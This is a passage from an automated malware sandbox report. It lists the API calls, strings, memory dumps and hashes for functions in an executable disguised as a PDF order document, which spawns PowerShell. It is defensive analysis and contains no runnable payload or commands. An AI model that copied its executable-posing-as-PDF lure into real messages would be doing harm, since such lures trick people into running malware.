RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 61b01d759961c4e40bf2e960662e07dc36c2227ae484429a43adcb02bb257662
Instruction ID: 148915660003aa48eae5eddbcc28bbe782376451a520f9e519856868b1d6a9df
Opcode Fuzzy Hash: 61b01d759961c4e40bf2e960662e07dc36c2227ae484429a43adcb02bb257662
Instruction Fuzzy Hash: 8D215771900109BBEF129F90CE89EEE7A7DEF44344F100076FA55B11A0E7B49E54AA68

Function 00401D65 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D7E
GetClientRect.USER32(?,?), ref: 00401DCC
LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DFC
SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E10
DeleteObject.GDI32(00000000), ref: 00401E20

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 4492c83c4d65da0acc651225de8424e6b85cfb3cdfcda7d846524d3670ad2bdd
Instruction ID: ebfb82876bdf2138dcddadba10df032a250d68975ffa4ffa2b6a0506bdc7ea5a
Opcode Fuzzy Hash: 4492c83c4d65da0acc651225de8424e6b85cfb3cdfcda7d846524d3670ad2bdd
Instruction Fuzzy Hash: 7F212872A00109AFCB05DFA4DD85AAEBBB5FB48300F24407EF905F62A1CB389941DB58

Function 00401C2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6

Strings

!, xrefs: 00401C6A

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: db3aae198123fe1a7288e066631643491dd1161a9dd5b8c68cc845e87539b238
Instruction ID: 5277f65d77addf964e4e112e3ca2bdcdb488fad455084b9b29b5161e7124752c
Opcode Fuzzy Hash: db3aae198123fe1a7288e066631643491dd1161a9dd5b8c68cc845e87539b238
Instruction Fuzzy Hash: 4C216071944208BEEB059FB5D98AAAE7FB5EF44304F20847FF502B61D1D6B88540DB28

Function 004049A1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(0079F568,0079F568,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048BC,000000DF,00000000,00000400,?), ref: 00404A3F
wsprintfA.USER32 ref: 00404A47
SetDlgItemTextA.USER32(?,0079F568), ref: 00404A5A

Strings

%u.%u%s%s, xrefs: 00404A29

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: ed987abf90c6e27c05c654f7c34a033b58f0c9b6cb29f4e6cc8d7c7430104512
Instruction ID: 2d600006130e1353e9717e04d579c0b21937dc8f48943746337f7f8a87e4f386
Opcode Fuzzy Hash: ed987abf90c6e27c05c654f7c34a033b58f0c9b6cb29f4e6cc8d7c7430104512
Instruction Fuzzy Hash: 5711B7B760412427DB00667D9C45EAF3298DB85378F250237FA66F71D2E978CC2242A9

Function 00405B5A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004060D4: lstrcpynA.KERNEL32(?,?,00000400,004033F7,Bysamfund,NSIS Error,?,00000007,00000009,0000000B), ref: 004060E1

Part of subcall function 00405B05: CharNextA.USER32(?,?,007A0970,?,00405B71,007A0970,007A0970,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004058BC,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B13
Part of subcall function 00405B05: CharNextA.USER32(00000000), ref: 00405B18
Part of subcall function 00405B05: CharNextA.USER32(00000000), ref: 00405B2C

lstrlenA.KERNEL32(007A0970,00000000,007A0970,007A0970,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004058BC,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BAD
GetFileAttributesA.KERNEL32(007A0970,007A0970,007A0970,007A0970,007A0970,007A0970,00000000,007A0970,007A0970,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004058BC,?,74DF3410,C:\Users\user\AppData\Local\Temp\), ref: 00405BBD

Strings

pz, xrefs: 00405B60
C:\Users\user\AppData\Local\Temp\, xrefs: 00405B5A

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\$pz
API String ID: 3248276644-1633741497
Opcode ID: 4efc29256ecc737a82cedd05a7c6237be84f99c24c6a7e1b03480747464f6d67
Instruction ID: 7cbc09aec6071699a8b6d0bfe618f446c080df756954f9e0a70e7bdf69c0a73f
Opcode Fuzzy Hash: 4efc29256ecc737a82cedd05a7c6237be84f99c24c6a7e1b03480747464f6d67
Instruction Fuzzy Hash: A6F0C825105D5516C622623A0C05E9F3A64CE8732871A063FF8A1B12D3DF3CB9439D6E

Function 00405A6C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403312,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00405A72
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403312,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00405A7B
lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405A8C

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405A6C

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
Instruction ID: 34bed66953ae9f6d257ce18580ddfb03ef3f992d07e6ea95338c5d753b7bd418
Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
Instruction Fuzzy Hash: 47D0A7622456307BD20167154C05ECB19088F063047054036F541B2192C73C4C1187FD

Function 00402E3D Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,0040301B,00000001), ref: 00402E50
GetTickCount.KERNEL32 ref: 00402E6E
CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402E8B
ShowWindow.USER32(00000000,00000005), ref: 00402E99

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 2c4addb43d5c00204abaef2ddcbdcde683c8282d51b9ea1b9effed1c6012b8ed
Instruction ID: 07a7c2fcb6e55b04e3e3d34d53389a9772e5beadce82dbb6bf9e24f56b5acc78
Opcode Fuzzy Hash: 2c4addb43d5c00204abaef2ddcbdcde683c8282d51b9ea1b9effed1c6012b8ed
Instruction Fuzzy Hash: 91F05E30481624EFC621AB64FE0CA9B7B64BB44B41711893FF085B12F8C77808828BDC

Function 0040516F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040519E
CallWindowProcA.USER32(?,?,?,?), ref: 004051EF

Part of subcall function 004041A4: SendMessageA.USER32(00010488,00000000,00000000,00000000), ref: 004041B6

Strings

, xrefs: 0040517F

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 34aba529733e3b32ef5863def0a598af0a9d68f7816d72c254ac1b8fca419f55
Instruction ID: a815c8626c5111ac64f0cf4f46d81bc36f874ce80d1ab61a55fc5c00676d5aef
Opcode Fuzzy Hash: 34aba529733e3b32ef5863def0a598af0a9d68f7816d72c254ac1b8fca419f55
Instruction Fuzzy Hash: 1A015E31600608ABEF205F11DD84B9B376AEB84315F244137FA00791D0C7799D62DA69

Function 00403852 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,74DF3410,00000000,C:\Users\user\AppData\Local\Temp\,0040382A,00403644,?,?,00000007,00000009,0000000B), ref: 0040386C
GlobalFree.KERNEL32(00000000), ref: 00403873

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403852

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3081826266
Opcode ID: bdac3d50bedc405d14197a73e0b52ba201dc392026dc5281ea4620f547822cc0
Instruction ID: a47bf4f3c2a96a327e4b4819c0cefa3b0cf6e53b08830cce55d404a8342abc97
Opcode Fuzzy Hash: bdac3d50bedc405d14197a73e0b52ba201dc392026dc5281ea4620f547822cc0
Instruction Fuzzy Hash: 22E01D3350112057C6616F55EE0475977AD5F49B26F06806BF880773514774AC534FDC

Function 00405AB3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe,C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe,80000000,00000003), ref: 00405AB9
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe,C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe,80000000,00000003), ref: 00405AC7

Strings

C:\Users\user\Desktop, xrefs: 00405AB3

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-224404859
Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
Instruction ID: b470c799eb173815a0b66f2a5ec0288490d136ddbfbfb3d8272f9cf217b16711
Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
Instruction Fuzzy Hash: C5D0A7635089706FE303A2108C44B9F6A48DF17300F1D4462F081A2191C6784C428BFD

Function 00405BD2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BE2
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BFA
CharNextA.USER32(00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C0B
lstrlenA.KERNEL32(00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C14

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
Instruction ID: c18a7a17a862b3ccaab34bb7c38a9d703f10cc619688c1102a12456a902c3210
Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
Instruction Fuzzy Hash: 65F0F631208914FFDB12DFA4DD40D9EBBB8EF56354B2540B9E840FB210D674EE019BA8

Analysis Process: powershell.exePID: 7512, Parent PID: 7472COMMON

Executed Functions

Function 04FDE260 Relevance: .8, Instructions: 781COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2036858233.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4fd0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e120377c23c1e32f26aa4b1a39a65c0101a0215db6b1651cd09c21aca9d56184
Instruction ID: 791328689a9284693c10f58346b1640727dafe652ddb0cae1644e9540133759e
Opcode Fuzzy Hash: e120377c23c1e32f26aa4b1a39a65c0101a0215db6b1651cd09c21aca9d56184
Instruction Fuzzy Hash: E8628F34B01619CFDB24DF64C8547ADBBB3EF84305F1884A9D90AAB351EB34AD86CB51

Function 0941061E Relevance: 23.7, Strings: 18, Instructions: 1159COMMON

Download Yara Rule

Strings

$^q, xrefs: 09410CBE
$^q, xrefs: 09411070
$^q, xrefs: 09411054
tP^q, xrefs: 094110E0
4'^q, xrefs: 09410F3A
(fwl, xrefs: 0941137B
4'^q, xrefs: 09410D4D
$^q, xrefs: 0941108F
h2jk, xrefs: 09410B43
$^q, xrefs: 09411038
$^q, xrefs: 0941107C
$^q, xrefs: 09410CEF
4'^q, xrefs: 09410D59
4'^q, xrefs: 09410F46
$^q, xrefs: 09410CDF
tP^q, xrefs: 094110D4
(fwl, xrefs: 09411371
$^q, xrefs: 0941109B

Memory Dump Source

Source File: 00000001.00000002.2048833272.0000000009410000.00000040.00000800.00020000.00000000.sdmp, Offset: 09410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9410000_powershell.jbxd

Similarity

API ID:
